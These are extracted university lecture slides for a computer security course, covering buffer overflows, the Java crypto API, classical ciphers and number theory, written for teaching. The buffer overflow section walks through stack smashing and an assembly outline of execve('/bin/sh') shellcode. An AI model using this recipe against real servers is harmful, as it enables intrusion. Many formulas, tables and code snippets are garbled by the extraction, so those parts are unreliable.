Wade Trappe

Lecture Slides
CS4236 Principles & Practice of Computer Security http://www.comp.nus.edu.sg/~cs4236/

Sandeep Kumar
skumar@comp.nus.edu.sg
Lecture Slides p.1
CS4236Computer Security II
Textbook: Introduction to Cryptography with Coding Theory by Wade Trappe and Lawrence Washington. Remaining: System & Network Security.
Useful if handy with Linux. Chapters 1 8, 11 13, 17 or as much of them as possible.
Ofce Hours: Tue 5-6pm in S15#04-08. Grading policy:
Marks for tutorials 10%. Each tutorial question will have marks. You must attempt enough questions to get at least 10 marks during the semester.
CS4236 intro p.2
Caveats
I will not know all the answers. I hope not! Its unlikely that my lecture slides will be ready before the lecture. Mutual discussion is highly encouraged, blind copying is not. (Cheating | plagiarism) F in class. Give me regular feedback about speed and strenuity of the class. Start looking for paper to present.
CS4236 intro p.3
Is Computer Security necessary?

Adapted from [Kan01]. Because a lot of money is handled by computers. Because a lot of important information is stored on and handled by computers. Would you want anyone to nd your GPA, SAT, or GRE scores? How about your credit history, or your medical history? There needs to be a mechanism to control sharing of information. Because society is increasingly dependent on the correct operation of computers. See zdnet.
Overview of Computer Security p.4
Examples of Security Problems

Adapted from [Kan01]. The Internet Worm c1988 (buffer overow). Spread over the Internet to many sites. Around 6000 sites were shut down to get rid of it. Virus Attacks. Denial of Service Attacks. Flooding of web servers with enormous # of requests. Flooding networks enroute the target. Exploiting target TCP state machines. See Christoph Schubas synkill paper.
Examples of Denial of Service

HEAVY SPOOFED TRAFFIC
YOU
YAHOO WEB SERVER

bottleneck link
ATTACKER
TCP SYN TCP SYN+ACK
TARGET (allocates resources)
Wait...wait...wait
Traditional elements of Information Security - goals in [P96]
Condentiality [they want your data]. Assets of a

computing system are accessible only to authorized parties. Includes reading, printing, or even testing for existence of an object.
Breach: interception. Integrity. Assets can be modied only by authorized parties.

In security, usually distinct from structural integrity (well formedness).
Breach: modication, fabrication. Availability [they want your bandwidth, cpu, disk]. Assets are accessible to authorized parties. Breach: interruption.
Why is security hard?

Adapted from [Kan01]. Tradeoff between convenience and security, or performance and security. Wily human opponents seek to outwit us. Must assume that the opponent will attack the weakest point. Must get everything right any mistake is an opportunity for the opponent. Bug-free software?
Design Principles for Secure Systems

From Saltzer and Schroeder [SS75]. Economy of [protection] mechanism. Keep the design as simple and small as possible. Fail-safe defaults. Base access decisions on permission rather than exclusion. Complete mediation. Every access to every object must be checked for authorization. Open design. Security through obscurity is not.
Design Principles for Secure Systems. . .
Separation of privileges. Two locks are better than one! Least privilege. Operate using the least privileges necessary to complete the job. Least common mechanism. Minimize the amount of mechanism common to more than one user and depended on by all users. Acceptability. Human interface should be easy to use.
Design Principles for Secure Systems. . .
Lessons: Blaine Burnham. Hear his keynote address at Usenix 2000 here.
add security later on.
Security is not an add on. Lets build it (get it to run) and Assurance matters. It takes a secret to keep a secret i.e., good key management is really hard. There are no silver bullets. Security is a system property. Composing components
some of which purport to be secure may not result in a secure system.
Buffer Overow: Attack of the Decade
Adapted from [Bon] and [CWP+ 99]. Extremely common bug. 1997: 16/28 CERT advisories. 1998: 9/13 CERT advisories. 1999: 6/12 CERT advisories. Often leads to total compromise of host. Requires expertise and patience (until someone posts an exploit). Cert statistics can be found here.
Buffer Overow Mechanism

Two steps: Inject suitable code in the programs address space. Get the program to jump to that code, with suitable parameters loaded into registers and memory.
Injecting code on Activation Record

Suppose a web server contains the function:

$ " ! #


When the function is invoked, the stack looks like:
Lower address

Higher address frame ptr ret addr str

buf[0..n]
callee constructed
strcpy overflows ret addr
caller constructed
%ebp = frame pointer. %esp = stack pointer. %ebp+4 = return address. %ebp+8 = rst argument to function. Caller pushes args in reverse order. Callee creates frame linkage.
FP

What if str is 136 bytes? After strcpy, the stack looks like:
buf
frame ptr
ret addr
str
The basic problem is that strcpy doesnt do range checking.
Stack Smashing Attack

What if the buffer overow results in the following stack state:
buf
frame ptr ret addr (irrelevant)
P: execve(/bin/bash, char **argv, char **envp) properly constructed!
See the Aleph One article for step-by-step description.
Constructing call to execve

%eax contains the syscall number 11 (for execve). %ebx contains the 1st arg to the syscall, a pointer to the string /bin/sh\0 .
%ecx contains the 2nd arg to the syscall (argv) which is a pointer to the rst element of an array of (char *)s. The last element of the array is NULL. %ecx 0 /bin/sh\0
%edx contains the 3rd arg to the syscall (envp) points to an array of ptrs that ends in NULL. So what if we had %edx point to a location that contained the NULL pointer (0).
Constructing call to execve. . .

So, it looks like
x / b b i n / x+7 s h \0 x c d %ebx x 0
%ecx x + 8 (2 elem array)
%edx x + 9 (1 elem array)
We can determine x dynamically
Constructing overow buffer

noop noop jmp offset-to-call popl %esi movl %esi,array-offset(%esi) movb $0x0,nullbyteoffset(%esi) movl $0x0,null-offset(%esi) movl $0xb,%eax movl %esi,%ebx leal array-offset,(%esi),%ecx leal null-offset(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call offset-to-popl /bin/sh string goes here. land anywhere in here
%esi now contains addr of /bin/sh save addr /bin/sh here terminate /bin/sh with \0 /bin/sh\0 , addr , NULL 11 for execve reg b /bin/sh reg c [addr of /bin/sh\0 , NULL] reg d NULL trap to kernel exit(0) if execve failed
save addr of /bin/sh on stack not NULL terminated else strcpy may stop Overview of Computer Security p.20
Stack Smashing Attack

When func() returns, /bin/sh will read and write le descriptors 0 and 1. Often redirected to read from and write to a socket. Attack code runs on the stack. Unsafe libc calls: strcpy, strcat, gets no range checking.
Exploiting buffer overows

If the web server calls func() with given URL, then an attacker can create a 200 byte URL to obtain shell on the web server! Some complications: Program P shouldnt contain the \0 character. Overow shouldnt crash the program before func() returns. Recent buffer overows of this type: Overow in the MIME type eld in MS Outlook. Overow in ISAPI in IIS.
Java Crypto API

Based on JDK1.5
Some keyrelated classes in Java

java.security.Keytop-level interface for all opaque keys (symmetric and asymmetric). String getAlgorithm() name of the algorithm of the key. byte[] getEncoded() the raw bytes of the key in its primary encoding format. String getFormat() the format of the encoded key, for e.g., PKCS#8, X.509.
Subset of Java Crypto API p.24
Creating keys for symmetric ciphers

javax.crypto.SecretKey is a sub-interface of Key and represents a secret (symmetric) key. Class SecretKeySpec implements SecretKey. To generate a DES key for the byte sequence 0x0102030405060708, use:
"

$
"
"
"


"
"
"
"
"
"
"
"
KeySpec
java.security.spec.KeySpecan interface that denotes the transparent (user-visible) representation of the key material that constitutes a key. Contains no methods or constants. Class SecretKeySpec implements KeySpec & SecretKey (more directly relevant for us). SecretKey is an interface that extends Key. So it can be used with Cipher. To generate a DES key for 0x0102030405060708, use:
byte[] desKey key = new byte[8] {0x01,...}; = new SecretKeySpec(key, "DES");
Using IVs with symmetric ciphers

javax.crypto.spec.IvParameterSpeca class that species an IV. Implements AlgorithmParameterSpec. public IvParameterSpec(byte[] iv), for e.g., create an eight byte array and initialize it with the IV and create an IvParameterSpec. Can be used in Cipher.init(...) because its an AlgorithmParameterSpec.
The Cipher class

javax.crypto.Ciphera class that provides the functionality of encryption and decryption (both symmetric and asymmetric).
public static Cipher getInstance(String tx). For e.g.,

Tx or transformation algorithm/mode/padding.
A cipher can be initialized with cipher.init(int Cipher.ENCRYPT_MODE, Key key, AlgorithmParameterSpec IV). cipher.init(int Cipher.ENCRYPT_MODE, Key key). This generates its own IV which can be retrieved with cipher.getIV().
Cipher. . .
To encrypt a byte stream, use
byte[] encryptedBytes = cipher.update(buffer, 0, b_read); length(returned bytes) = length(argument bytes) No semantics specied in the Java API. Must collect a blocks worth of data.
To end encryption, use

byte[] encryptedBytes = cipher.doFinal(); All outstanding bytes are returned. Padding is applied if specied.

Using Hashes

To calculate the MD5 checksum of a byte stream, use
X.500 Names
Loosely, an X.500 name is hierarchical and consists of the following attributes: Country: SG. State or Province: Singapore. Locality: Clementi. Organization: National University of Singapore. Organizational Unit: School of Computing. Common Name: Sandeep Kumar. Email Address: skumar@comp.nus.edu.sg.
Base 64 encoding
Look here for more information. There must be other references. Encode a sequence of octets using the characters [A-Za-z0-9+/] to represent 6 bits each. Use the character = for trailing padding. 6 bits of input represented as one printable character of 8 bits 33% expansion. Ex: 0x1F is Hw==. Is it?
Classical Ciphers
Pre DES
Shannons model of a secrecy system

Diagram as in [Sha49].
enemy cryptanalyst
Sender plaintext source P encrypter K secure channel C decrypter K P
Receiver destination
key source
Classical Ciphers p.34
Shannons model. . .
Encryption encodes a message so its meaning is not obvious. For symmetric encryption P = D(K, E (K, P )). For asymmetric encryption P = D(KD , E (KE , P )). Security of a cryptosystem should rest entirely in the secrecy of the key, and not in the secrecy of the algorithm (Kerckhoffs).
Types of attacks
Cryptographers design their algorithms to resist the following increasingly aggressive attacks [Susan Landau].
Ciphertext-only: adversary has access to encrypted comms. Known-plaintext: adversary has some (plaintext, ciphertext). Chosen-text: the adversary chooses the plaintext to be encrypted. the ciphertext to be decrypted (chosen ciphertext). the plaintext to be encrypted depending on ciphertext received from previous requests (adaptive chosen plaintext).
Monoalphabetic Substitution Cipher

Shift cipher, for e.g., Caesars cipher is a very simple permutation, for e.g., rot13. An example is shift by 3.
ab cdef ghi j k l mnopqr s t uvwxyz def gh i jk l mno p q rstuvwxy z abc So the secret message attack at dawn is encrypted as a t t a c k a t d a w n g d z q
d w w a f
d w
Keyspace: 25. Can be broken using cipher text only.
Afne Ciphers
A specic way to construct a permutation. Choose two integers and , with gcd(, 26) = 1, and consider the ciphering function y = x + Keyspace = 11 26. Easy to break with a ciphertext only attack.
Monobetic substitution cipher

In general, the secret key is a table, a permutation that maps each symbol of P T onto a symbol of CT , for e.g., ab cdef gh i jk l mnopqr s tuvw xyz pandor sbxcef g hi jk l mq t u v wyz Keyspace: 26! (permutations). At 1 decrypt/s, requires 103 years to cycle through. Constructing an easy to remember permutation is simple with a keyword, such as pandorasbox above.
Monobetic substitution cipher. . .

Unfortunately, one can use frequency of English letters
e t a o i n 12.5% 9.25% 8.04% 7.60% 7.26% 7.09%
and pairs to break this cipher using a ciphertext only attack. Most common digram: th, most common trigram: the.
Example of mono cryptanalysis

Example from [Kip99]:
ETNAN XFWN LYK Y RYETNA QF EBWKXF LTX KYQP ETQK YPHQWN QK RXA DXB KXF DXB PXFE LYKT DXBAKNMR LNMM KX DXBA RNNE KCNMM MQUN TNMM QR QF VNP LQET Y ZQAM UNNI DXBA KTXNK XF Set N = E as N is the most frequent letter; now search for the, 3 times N is preceded by T , set T = H , 2 times T N is preceded by E , set E = T . Notice the lone Y , set Y = A. The rst word could be there, so set A = R. If A = R, then R = R, maybe R = F . Try http://localhost/info/cgi-bin/mono.cgi for a demo.
Unfortunately, same letters in plaintext encrypt to same letters in ciphertext.
Vigenre Cipher
Invented circa 1520. Applied arithmetic to ciphers. wha t anicedaytoday c ryptocryptocryp t y yy i tb. . . . . . . . . . . Use the Vigenre tableau to encrypt or decrypt messages. Its like n instances of Csars cipher. Or, its addition modulo 26 where a = 0, . . . , z = 25. Keyspace: 26n , n is the number of symbols in the key. It evens out the frequency disparity in the plaintext alphabet.
Vigenre Cipher. . .
Vigenres tableau (part of)
abcde fgh i j k l mnopqr s t u v wxyz a b c d abcde fgh i j k l mnopqr s t u v wxyz bcde fgh i j k l m n opqr s t u v w x yza cde fgh i j k l m n o pqr s t u v w x y zab de fgh i j k l m n o p qr s t uvw x y z abc
Cryptanalysis of Vigenre Cipher. . .

Easy to break [Fri84, pg. 17], [Sta99, pg. 40], [P96, pg. 35]: Find key length. Kasiski: Identical sequences of plaintext at integral multiples of keyword length identical ciphertext sequences. Look for common factors. English uses several endings and beginnings disproportionately often. Words such as of, and, to etc. appear in high frequency.

Divide the cipher text into key length sized blocks. All elements corresponding to the same relative position within each block form a monoalphabetic cipher. Break each for every position of the block. Cipher-text only attack.

Use the Index of Coincidence. It is dened as the probability that two randomly selected letters in a ciphertext are identical.
i
IC =
ni 2 1)
1 2 n(n
where ni is the # of occurrences of symbol i, say a . . . z .

See [TW02, Section 2.3] for details. To compute |key |. What if we computed IC from the ciphertext c1 . . . . . . cn sample by counting coincidences with the shifted ciphertext ck . . . cn c1 . . . ck1 ? If k = |key |, then
c1 , ck are shifted by the same amount, as are c2 , ck+1 etc. So we should nd the IC to be close to that of English! Because a monobetic transformation doesnt change the IC .
Index of Coincidence. . .
Another interpretation of IC is that its a measure of the variation between frequencies in a distribution [from the uniform] [P96, Section 2.3]. If represents a plaintext symbol, then P = 1. Lets nd the variation of a given distribution from a at distribution P = 1/||. var = = Now,
2 P ni n =z 1 2 =a P 26 =z 2 1 P =a 26
ni 1 n1
IC = var + const!

Example: Consider the ciphertext
WSPGM VESQT CXHCX JXTJI TWSGR JX HHEHM IMMKW HSMGX RIRVE HIRGK CMTGP BMTKW WMNIA XRTAX PVDNI NROVX CSTVL XPLVY WETUS HWOHL WISCQ TGOPZ GROWX BITJM DAIVX TXHKR XGTQM LILNF CKMCO JVNUS

The counts of the various letters are:
a 3 s 8 b 2 t 12 c 7 u 2 d 2 v 8 e 4 w 9 f 1 x 13 g 8 y 1 h 9 z 1 i 10 j 5 k 5 l 5 m 11 n 5 o 5 p 5 q 3 r 8
The total # of letters is 152. Thus

i i IC = n(n1) = 3 2 + 2 1 + 1 0 + 1 0 1048 = 152 151 = .0457 25 i=0
n (n 1)
Index of Coincidence. . .
IC is a predictor of key length when it is small. It cannot discriminate well for large key lengths. .038 = 1/26, which is what wed expect. keylen 1 2 3 4 5 10 large IC .068 .052 .047 .044 .044 .041 .038
Permutation Cipher
Columnar transposition. Consider the plain text howareyoudoing. Write this as two blocks of seven characters each h o w a r e y o u t o d a y The cipher text is the plaintext read in column order. So the cipher text is hoouwtaordeayy. Same letter frequencies as original text. Can be broken using a form of frequency analysis. Can be broken with a KPA.
Permutation Cipher. . .
Its a permutation on the position of PT symbols in the corresponding CT. For e.g., HELLOWORD might be transformed into LWHOEROLD. An example permutation is 1 2 3 4 5 6 7 8 9 = 3 5 1 4 2 7 9 6 9
Playfair cipher
1854 by Sir Charles Wheatstone. 5 5 matrix of letters constructed using a keyword [Sta99]. In general, insert a ller letter such as i between successive identical letters to avoid needing to encrypt pairs such as tt.
M C E L U O H F P V N Y G Q W A B I/J S X R D K T Z ATTACKATDAWN RSSRDERSBRNY
Playfair Cipher. . .
Used by the British Army in WW I. Frequency analysis more difcult. But still susceptible to digram frequency analysis. Flatter distribution than plaintext, nevertheless plenty of structure. Both digrams re and er common. So if pairs IG & GI are common, e, i, r, g probably form the corners of a square, such as e i e g or g r i r Last few rows of the matrix predictable. Each plaintext letter encrypts to one of ve ciphertext letters. h {c, y, b, d, f } in the previous example.
Hill Cipher
Invented by Lester Hill in 1929. A block cipher. A ciphertext letter depends on multiple plaintext letters! Strong against ciphertext only attack, but easily broken under known plaintext attack i.e., given a set of (P, C ) pairs, solve for K . det(K ) should be relatively prime to n in order for K to be invertible mod n. For a block size of 8, keyspace 2664 > 2 1090 . C = KP mod 26, 0 kij < 26
Perfect Substitution Cipher

Use an innite nonrepeating sequence as key. Confounds both Kasiski and Index of Coincidence. One-time pad. However, there is need for synchronization between sender and receiver. need for unlimited number of keys. Long random number sequences. Can be used at bit level [Gilbert Vernam, 1918]. However, statistical pseudorandomness unpredictable. Long sequences from books. Digits from the phone book. (might have some non-uniformity)
Linear Congruential Generator

A Linear Congruential Generator is of the form ri+1 = (a ri + b) mod n
where a, b, n are constants. Its totally linear! For e.g., given the random sequence 958833456, 396607904, 2147285887 for n = 231 1, we have the equations 396607904 2147285887 396805664 a = = = = a 958833456 + b mod 2147483647 a 396607904 + b mod 2147483647 a 562225552 mod 2147483647 16807
Vernam Cipher
Gilbert Vernam, 1918. Choose keyword as long as plaintext with no statistical relationship to it [Sta99, pg. 40]. Works on bits. ci = p i k i One Time Pad (Joseph Mauborgne): Use a random key as long as the message, but only once!
Rotor Machines
Three rotors plus a reector. After every letter was encrypted, the rotor turned like an odometer. Each letter encrypted by effectively a new mono alphabetic substitution cipher.
Knapsack Encryption
Given a set of integers a1 , a2 , . . . an , nd whether a subset of them adds up to a given integer t. For example, for the set A = {4, 7, 33, 1, 12, 78, 11, 291} Is there a subset that adds up to 17? To 129? To encrypt text, say NUS IS GREAT, use the ASCII bit sequence of each character to select the set of numbers in the knapsack to add. So N = 0x4E = 01001110 = 7 + 12 + 78 + 11 = 108. U = 0x55 = 01010101 = 7 + 1 + 78 + 291 = 377. . . . . . .and so on. . . . . .
Knapsack Encryption. . .
Alternatively, the knapsack can have 16 numbers and you can encrypt two characters at a time. Suppose that
A = {4, 7, 33, 1, 12, 78, 11, 291, 101, 29, 1101, 561, 487, 9826, 791, 893} Then you encrypt the message as NU SI SG RE AT The difculty is that solving the general knapsack is as difcult for the recipient as it is for the enemy.
Merkle-Hellman Knapsack Encryption
Make the problem difcult for the enemy but easy for the recipient! A superincreasing knapsack is one in which the integers in the knapsack form a superincreasing sequence. That is
k1
ak >
j =1
aj
An example is the sequence
Give a demo of superincreasing sequence using printSuperIncreasingSeq(superIncreasingSeq(7)).
A = {77, 105, 192, 392, 801, 1662, 3286, 6537}
Merkle-Hellman Knapsack Encryption. . .
Now supposing one were to ask if theres a subset of #s in the knapsack that add up to 2967, theres an easy way to nd it! But the problem is that solving a superincreasing knapsack is as easy for the enemy as it is for the recipient! So we try to confound the enemy by transforming a superincreasing knapsack into a random one.
En/decryption with MH Knapsacks Choose a prime m > ai . Choose a w rel. prime to m. Transform A into B such that bi = w ai mod m.
Lets say that m = 13917 for the example above and that w = 269. Then B = {6796, 411, 9897, 8029, 6714, 1734, 7163, 4911} To encode the character N which is 01001110, we might do 411 + 6714 + 1734 + 7163 = 16022. To decode this number, the recipient does 2691 16022 mod 13917 = 372516022 mod 13917 = 5854. Solving the superincreasing knapsack for 5854 gives the set 105 + 801 + 1662 + 3286!
En/decryption with Knapsacks. . .

Practical Implementation Generate random numbers 0 < ri < 2200 and choose ai = 2200+i1 + ri
Why is the Knapsack considered hard?
The general knapsack problem is NP Complete!
A primer on complexity theory

f (n) is said to be O(g (n)) if c, n0 such that Example: f (n) = 17n + 10 is O(n) because for n0 = 10. 17n + 10 18n f (n) c|g (n)| n n0
Demo plot [n=1:100] 17*n+10, 18*n.
Example: f (n) = at nt + at1 nt1 + + a0 is O(nt ).
A little primer on complexity theory. . .
The class P: problems that can be solved in time bounded by a polynomial function of the problem size. For example, sorting, nding the max of a set of numbers, multiplication, exponentiation. The class NP: problems that can be veried in polynomial time. For example, Hamiltonian cycle, CNF satisability. The class NP Complete: Problems in NP to which every other problem in NP can be reduced in polynomial time. If an NP Complete problem yields a polynomial time solution, then P = NP. In some sense then, these are the hardest problems to solve in the class NP. We know that P NP, that P = EXP. But is P = NP?
Lessons
Compress before you encrypt.
Number Theory
Chapter 3 of textbook
Modular Arithmetic
If a mod n = b, then a = c n + b. When you reduce a number a modulo n you usually want 0 b < n. Division Principle [Bar02, pg. 61]: Let n be a positive integer and let a be any integer. Then there is exactly one pair of integers (c, b), 0 b < n such that a=cn+b Examples: 17 mod 5 = 2. 5 mod 17 = 5. 8 mod 3 = 1.
Number Theory p.72
Modular Arithmetic. . .
Some interesting properties of modular arithmetic: (a + b) mod n = (a mod n + b mod n) mod n (a b) mod n = (a mod n b mod n) mod n a
1
mod n = (a mod n)1

?
which implies for example that (a (b + c)) mod n
= (a mod n (b + c) mod n) mod n
= (a mod n (b mod n + c mod n) mod n) mod n
Number Theory p.73
Example: = = = = = = = = (1234103 (123432 + 1004245 )) mod 7 2103 (232 + 3245 )) mod 7 2102 2 (232 + 3245 )) mod 7 2334 2 (232 + 3245 )) mod 7 834 2 (232 + 3245 )) mod 7 134 2 (232 + 3245 )) mod 7 2 (4 + 5) mod 7 2 2 mod 7 4
Number Theory p.74
Or, it is
6764272377039604808006178055144906284633965782655606023664543731697675295138467674632079193559564693975100853574063429268655061579855616806952088963846232974182208488038849558763634180303504832472507246314833258013960116375880716395998061679941933095837785630560123826359207260539700679914567732449971041003694134911024550323643899333412749847654642971626166584986296154744033730885175975569766206580332174388028086818262058659186680791454906474093459490637896812299657407272406107888091704653742699714387717546200022361247224368645062455882516778860769297702055240071720372570557423808644154330408879925808925140855381986628240396957657417866896014997202537989607295158526258761846453044514479205381938683422173039265005451812870791033921812833308341319798689265312644584797363587786225724994494157639438659457878075595424441169423586430034659067491156897331743802635884549667238178909903984749431006079030838865685491827363683331151586843871472933347390828720939664198710347727796483110738685594792944199344858089699587734429853257643035321271289118720 mod 7 =4
Number Theory p.75
Modular Exponentiation
Say you want to compute 6469 mod 7. You could compute Or, observe that That is 6
469
6 6 6 469 times
469 = 1110101012 = 28 + 27 + 26 + 24 + 22 + 20
28 27 26 24 22 20
=6 6 6 6 6 6
So instead compute each term individually with one multiply each. That is, compute 62 , 64 , 68 , 616 , 632 , 664 , 6128 , 6256 by repeated squaring.
Number Theory p.76
GCD
The GCD of two numbers a and b is the largest integer that divides both a and b. GCD(a, b) = GCD(b, a mod b) If d|a & d|b (LHS) then d|b & d|a mod b (RHS). I.e., all divisors of LHS are also divisors of RHS. Similarly, if d|b & d|(a mod b) d|a.
Why doesnt GCD(a, b) = GCD(a, a mod b) work? Because you cant go in the reverse direction, i.e., d|a & d|(a mod b) that d|b. This is because if d|(a mod b) then d|(a kb) but it may be that d|k instead of b.
Number Theory p.77
GCD. . .
| |
a%b
|
a
kb
| |
Number Theory p.78
ax + by = d
Theorem [TW02, Page 64]. Let a and b be two integers, with at least one of a, b = 0, and let d = gcd(a, b). Then integers x, y such that ax + by = d In particular, if a and b are relatively prime, then integers x, y such that ax + by = 1 Proof: By induction on the GCD procedure.
Number Theory p.79
Inverse
The inverse of an element x mod n is the element y s.t. xy = 1 (mod n) Consider the set of numbers modulo 9. Not every number has an inverse modulo 9. In fact, only numbers coprime to 9 have inverses!
Number Theory p.80
Inverse mod 9
0 1 2 3 4 5 6 7 8 0 0 0 0 0 0 0 0 0 0 1 0 1 2 3 4 5 6 7 8 2 0 2 4 6 8 1 3 5 7 3 0 3 6 0 3 6 0 3 6 4 0 4 8 3 7 2 6 1 5 5 0 5 1 6 2 7 3 8 4 6 0 6 3 0 6 3 0 6 3 7 0 7 5 3 1 8 6 4 2 8 0 8 7 6 5 4 3 2 1
Number Theory p.81
EGCD
The Extended Euclidean Algorithm EGCD(f, d) permits one to nd d1 (mod f ) and f 1 (mod d) [provided that GCD(f, d) = 1] in addition to GCD(f, d). Start with the vectors (1, 0, f ) & (0, 1, d) and reduce one vector with another by subtracting a multiple of one from the second until the result has the third component 1.
Number Theory p.82
EGCD. . .
Both vectors maintain the invariant f x1 + dx2 = x3 Eventually, you get an equation of the form f x1 + dx2 = 1 This gives x2 = d1 (mod f ) and x1 = f 1 (mod d).
Show examples of GCD & EGCD using RSA.pm and /bin/perl/egcd.
Number Theory p.83
Modular Division
Proposition [TW02, Page 68]. Let a, b, c, n be integers with n = 0 and with GCD(a, n) = 1. If ab ac (mod n) then b c (mod n)
Example: 2 1 2 4 (mod 6), but 1 = 4 (mod 6). Solving ax c (mod n), GCD(a, n) = 1 is now easy.
Number Theory p.84
Modular Division. . .
In the equation ax b (mod n), what if GCD(a, n) = d > 1?
b n Solve ( a ) x ( ) ( mod d d d ). Let the solution be x0 . Then ax0 b (mod n).
If d | b, there is no solution.
The solutions of ax b (mod n) are the unique values mod n that satisfy the equation above. The equation has d roots mod n, Each is distinct mod n, but mod n d.
x0 , [x0 +(n/d)], [x0 +2(n/d)], . . . , [x0 +(d 1)(n/d)]
Number Theory p.85
Modular Division. . .
0
n d 2n d
Theres a solution 0 < x0 < b n (a ) x ( ) ( mod d d d ).
n d
for
But if x0 is a solution, then so is x0 + k n d.
But x0 and x0 + k n d are mod n for 0 < k < d.
Number Theory p.86
Primes
An integer a > 1 whose only divisors are the trivial divisors 1 and a is said to be a prime number [CLRS01]. Example: 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . . . . If n is a composite integer, then n has a prime factor not exceeding n. What this means is that in order to test a number n for primality, its sufcient to try dividing it by all primes n. There are innitely many primes [Ros93, Theorem 1.17]. n! + 1 cannot have a prime divisor n.
Number Theory p.87
Primes. . .
(x), the numbers of primes n n/ log n as n . n/ log n as n . Even though the # of primes is , its density gets sparser and sparser as n . Approximately speaking, one would need to sample log n numbers to nd a prime close to n.
Use Gnuplot to plot [n=1:1000000] n/log(n),n to show how n/log(n) varies with n.
Number Theory p.88
Primes. . .
Consider nding all primes 25 using the sieve of Eratosthenes. 1 6 11 16 21 2 7 12 17 22 3 8 13 18 23 4 9 14 19 24 5 10 15 20 25
Number Theory p.89
Factorization
Find a factor of n by successively dividing n by primes 2 . . . n . To nd the factors of n, nd x y (mod n) with x2 y 2 (mod n) [TW02, Sec. 6.3]. Then, gcd(x y, n) gives a non trivial factor of n. Pollards p 1 method. Find a number x thats a multiple of p 1 where p is a non-trivial factor of n. Then for a rel. prime to n ( also rel. prime to p), or ax 1 is a possible non-trivial factor of n. See [TW02, Sec. 6.4] for details. ax 1 (mod p)
Number Theory p.90
Fermats Theorem
For prime p and integer b not divisible by p, bp1 1 (mod p)
Consider P = 1b 2b 3b (p 2)b (p 1)b = bp1 (p 1)! 1 b = 2 b = 3 b = = (p 1) b because the residue system mod p is a eld and b has an inverse in it. Thus 1b, 2b, . . . merely enumerate the numbers 1 . . . (p 1) in some order. Canceling out (p 1)! from both sides [because (p 1)! is coprime to p] of the equation we get bp1 = 1.
Number Theoretic Theorems p.91
Using Fermats Theorem

Consider the prime 17. Then 216 = 65536 = 1 mod 17. 416 = 4294967296 = 1 mod 17. 1516 = 6568408355712890625 = 1 mod 17. Lets try the same exercise with the prime 19. 218 = 262144 = 1 mod 19. 418 = 68719476736 = 1 mod 19. 1518 = 1477891880035400390625 = 1 mod 19.
If xp1 = 1 mod p, then x xp2 = 1 mod p. This means that xp2 is the inverse of x mod p.
Eulers theorem
It is a generalization of Fermats theorem. Denition: (n) is the # of positive integers < n that are relatively prime to n. For e.g., (9) = 1, 2, 3, 4, 5, 6, 7, 8 = 6. Theorem: If GCD(x, n) = 1, then If p is prime then (p) = (p 1). x(n) = 1 (mod n)
Eulers function
(pr ) = pr pr1 . Numbers not relatively prime to pr are p, 2p, . . . , pr p. That is pr1 1 numbers. Therefore, # of integers relatively prime to pr are pr 1 (pr1 1) = pr1 (p 1) If gcd(m, n) = 1 then (mn) = (m)(n) Follows from CRT. The pairs (x {(m)}, y {(n)}) are relatively prime to both m and n. Consider CRT 1 of (x, y ) to be a mod (mn). If gcd(a, mn) = 1, let gcd(a, m) = d = 1. Then d | a and d | m, so d | (a mod m).
Primitive Roots
g is a primitive root of n if ord(g ) = (n). Not all integers have primitive roots. Integers with primitive roots are of the form: 2, 4, p , 2p , p odd prime. When p is a prime, a primitive root mod p is a number whose powers yield every nonzero number mod p.
Primitive Roots. . .
0 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 1 10 1 11 2 1 4 9 16 6 17 11 7 5 5 7 3 1 8 8 7 7 1 7 12 4 1 5 9 4 5 1 15 9 5 6 1 7 7 7 11 1 7 1 14 2 6 16 9 8 4 8 1 9 6 5 4 16 9 10 11 12 13 14 15 16 17 18 1 1 1 1 1 3 1 6 4 1 12 1 5 1 1 10 1 5 1 18 17 15 11 1 1 1 4 16 7 5 6 17 7 7 11 1 9 9 5 14 8 2 3 7 7 16 13 18 16 10 11 14 12 17 13 1 7 16 4 1 7 11 1
17 11
9 17 11 6 4 8
11 17
6 11 17 9
5 11 9 16 1 7 18 11 12 1 8 4 2 1
7 11 1 6 6 7 4 9 5 16 11 3 8
7 11 1 17 1
7 11 1
18 11 12
7 18 11 12 1
6 16 11 4 17 1 13 16 1 11 7 1 8 1 3 1 8 8 7 9 6 5
11 15 17 18 1 11 7
1 11 7
1 11 7 6 5 4
1 11 7 7 7 15 2 5 9 4
1 12 11 18 1 13 17 12 1 14 1 16 1 17 1 18 6 9 4 8 11 1 15 16 12
1 12 11 18 7 7 7 7 3 17 5 4 5 6 9 18 18
1 12 11 18 7
14 11 10 16 18 2 4 6 11 13
17 10
13 11
12 16 15 1 14 1 9 1 7 17 6 1
10 17
1 16 9 11 5
11 16
1 17 4 11 16 6
1 18 1 18 1 18 1 18 1 18 1 18 1 18 1 18Theoretic 1 Theorems p.96 Number
Primitive Roots. . .
Let g be a primitive root for prime p [TW02, Sec. 3.7]. If n is an integer, then g n 1 (mod p) iff If j and k are integers, then g j g k (mod p) iff j k (mod p 1) n 0 (mod p 1)
CRT
See [Knu98, Section 4.3.2]. Alternative for doing arithmetic on large numbers. Have several moduli m1 , m2 , . . . , mr relatively prime in pairs and work on residues u mod mi instead of with u. Regard (u1 , u2 , . . . , ur ) as a new type of internal representation for u. Disadvantage: Cant test for >, overow, do division.
CRT. . .
Advantage: Parallelizes multiplication.
(u1 , u2 , . . . , ur ) + (v1 , v2 , . . . , vr ) = ((u1 + v1 ) mod m1 , . . . , (ur + vr ) mod mr ) (u1 , u2 , . . . , ur ) (v1 , v2 , . . . , vr ) = ((u1 v1 ) mod m1 , . . . , (ur vr ) mod mr ) (u1 , u2 , . . . , ur ) (v1 , v2 , . . . , vr ) = ((u1 v1 ) mod m1 , . . . , (ur vr ) mod mr ) You can see the above because uv mod mi = (u mod mi )(v mod mi ) mod mi (1) (2) (3)
This means that the representation of u v in the mi component should be (u mod mi ) (v mod mi ). Number Theoretic Theorems p.99
CRT. . .
Proof: Let m = m1 m2 mr and let u1 , u2 , . . . , ur be integers. Then there is exactly one integer u such that 0 u < m u uj (mod mj ), 1 j r
1 Let Mk = m/mk . Then GCD(Mk , mk ) = 1. So Mk mod mk exists. Let this be yk . yk is small, with 0 < yk < mk . Then
u = u 1 M1 y1 + u 2 M2 y2 + + u r Mr yr is the solution of the simultaneous congruences.
CRT Example
